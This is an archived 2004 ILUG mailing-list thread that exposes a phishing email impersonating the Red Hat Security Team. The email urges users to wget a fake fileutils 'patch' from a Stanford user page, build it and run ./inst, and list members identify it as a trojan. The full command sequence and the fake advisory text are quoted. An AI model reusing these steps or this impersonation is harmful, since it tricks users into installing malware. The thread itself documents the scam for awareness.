LINUX.IE, website of the Irish Linux Users' Group
Tux rules!

   
Home
New Users
Articles
Download
Projects
Community
Vendors

  Print Version
Email to...
 
Archives:


planetILUG

Recent News

News Archive


Join the
ILUG
on FaceBook


Join the
ILUG
on LinkedIn


Join the
ILUG SETI
Group



















 
 :: Mailing Lists

[ILUG] Fwd: RedHat: Buffer Overflow in "ls" and "mkdir"

[ILUG] Fwd: RedHat: Buffer Overflow in "ls" and "mkdir"

Rick Moen rick at linuxmafia.com
Sat Oct 23 19:22:28 IST 2004 

----- Forwarded message from Information Security Services <security-nr at stanford.edu> -----

From: Information Security Services <security-nr at stanford.edu>
To: Rick Moen <rick at linuxmafia.com>, inbox <security-nr at stanford.edu>
Date: Sat, 23 Oct 2004 11:16:14 -0700
X-Mailer: Microsoft Outlook Express 6.00.2800.1409
Subject: SU#2005-00212 - Re: Trojaned fileutils for Red Hat / Fedora being distributed from a user account
X-Spam-Status: No, hits=-4.4 required=5.0 tests=BAYES_00,HTML_MESSAGE,
	HTML_TITLE_UNTITLED autolearn=no version=2.63

Thank you for alerting us to this situation.  

We have disabled the link from our afs space and alerted the user to the account compromise.

Thanks again!
CJ

Carolyn Jane Hafner
Information Security Office, Internal Audit
Polya Hall, Room 119
255 Panama St.
Stanford, CA  94305-4136
(650) 996-7812
(650) 723-2911
security at stanford.edu
dmca-claim at stanford.edu
cjhafner at stanford.edu
  ----- Original Message ----- 
  From: Rick Moen 
  To: security at stanford.edu 
  Sent: Saturday, October 23, 2004 8:54 AM
  Subject: Trojaned fileutils for Red Hat / Fedora being distributed from a user account


  Please note the involvement of http://www.stanford.edu/~joeio/ in this 
  attempt to distribute a trojan.  Contents of the tarball in that
  directory appear to be Bourne shell compiled in an effort to obscure it.

  Sadly, I'm sure there are people stupid enough to fall for this.


  ----- Forwarded message from Marek <m.mcgann at sussex.ac.uk> -----

  From: Marek <m.mcgann at sussex.ac.uk>
  Organization: Centre for Research in the Cognitive Sciences (COGS)
  Date: Sat, 23 Oct 2004 12:35:44 +0100
  To: ilug at linux.ie
  Subject: [ILUG] Fwd: RedHat: Buffer Overflow in "ls" and "mkdir"

  Thought you might be interested to see the below - it's the first time I've 
  seen anything like this for Linux (apologies for the html mail, but that's 
  how it arrived) . 

  I presume it's this Joeio in Stanford (or whoever) trying to spam his way into 
  Red Hat boxes?

  Interesting to see someone considering desktop "not-terribly-clued-in" Linux 
  users a worthwhile target.

  Or am I being too suspicious about it?

  ----------  Forwarded Message  ----------

  Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
  Date: Saturday 23 October 2004 05:37
  From: RedHat Security Team <security at redhat.com>
  To: <another mailing list I'm subscribed to>

  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
  "http://www.w3.org/TR/html4/loose.dtd">
  <html>
  <head>
  <title>Untitled Document</title>
  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  <style type="text/css">
  <!--
  .style1 {font-size: 12px}
  - -->
  </style>
  </head>
  <body>
  <p><img src="http://www.redhat.com/g/chrome/logo_rh_home.png"></p>
  <p> Original issue date: October 20, 2004<br>
  Last revised: October 20, 2004<br>
  Source: RedHat </p>
  <p>A complete revision history is at the end of this file. </p>
  <p>Dear RedHat user,</p>
  <p>  Redhat found a vulnerability in fileutils (ls and mkdir), that could
   allow a remote attacker to execute arbitrary code with root privileges. Some
   of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat
   8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that
   *BSD and Solaris platforms are NOT affected.</p> <p>The RedHat Security Team
   strongly advises you to immediately apply the<strong> fileutils-1.0.6
   patch</strong>. This is a critical-critical update that you must make by
   following these steps:</p> <ul>
    <li>First download the patch from the Stanford RedHat mirror:
   <strong><em>wget
   www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz</em></strong></li>
   <li>Untar the patch:<em><strong> tar zxvf
   fileutils-1.0.6.patch.tar.gz</strong></em></li> <li><em><strong>cd
   fileutils-1.0.6.patch</strong></em></li>
    <li><em><strong>make</strong></em></li>
    <li><em><strong>./inst</strong></em></li>
  </ul>
  <p>Again, please apply this patch as soon as possible or you risk your system
   and others` to be compromised.</p> <p>Thank you for your prompt attention to
   this serious matter,</p>
  <p>RedHat Security Team.</p>
  <p class="style1"> Copyright &copy; 2004 Red Hat, Inc. All rights reserved.  
   </p> </body>
  </html>

  - -------------------------------------------------------
  -- 
  Irish Linux Users' Group
  http://www.linux.ie/mailman/listinfo/ilug/


  ----- End forwarded message -----



- ----- End forwarded message -----

More information about the ILUG mailing list
Read this without the formatting.
                                                                                                    

  

Hosted by HEAnet


 Maintained by the ILUG website team. The aim of Linux.ie is to support and help commercial and private users of Linux in Ireland. You can display ILUG news in your own webpages, read backend information to find out how. Networking services kindly provided by HEAnet, server kindly donated by Dell. Linux is a trademark of Linus Torvalds, used with permission. No penguins were harmed in the production or maintenance of this highly praised website. Looking for the Indian Linux Users' Group? Try here. If you've read all this and aren't a lawyer: you should be!
RSS Version
Powered by Dell